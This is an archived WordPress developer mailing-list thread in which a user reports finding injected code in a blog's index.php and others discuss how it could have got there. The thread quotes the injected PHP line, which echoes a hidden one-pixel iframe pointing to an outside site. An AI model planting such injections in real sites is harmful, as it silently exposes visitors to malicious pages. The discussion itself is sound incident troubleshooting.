[wp-hackers] XSS vuln in wordpress 2.7 ?

Stephen Rider wp-hackers at striderweb.com
Mon Dec 22 18:36:07 GMT 2008

Well, wait.  he said:  "i found [it in] my blog's index.php (not  
theme's index.php)"

Does this mean it shows up in the final rendered page, but not in the  
theme's file?  In that case, it's being added dynamically.  The link  
is not written in the theme.

Just trying to clarify.  I'm no security guru... (IANASG)


On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:

> If the file is writable for the webserver and file access is enabled  
> on the webserver: yes.

> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>> Wow. That's nasty, and malicious. Could a plugin do that?
>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>> For some reason i found my blog's index.php (not theme's index.php)
>>> with the following piece of code right before the ?>
>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>> I tried looking at the logs. No luck. The file's permisions look  
>>> like this:
>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/ 
>>> index.php

More information about the wp-hackers mailing list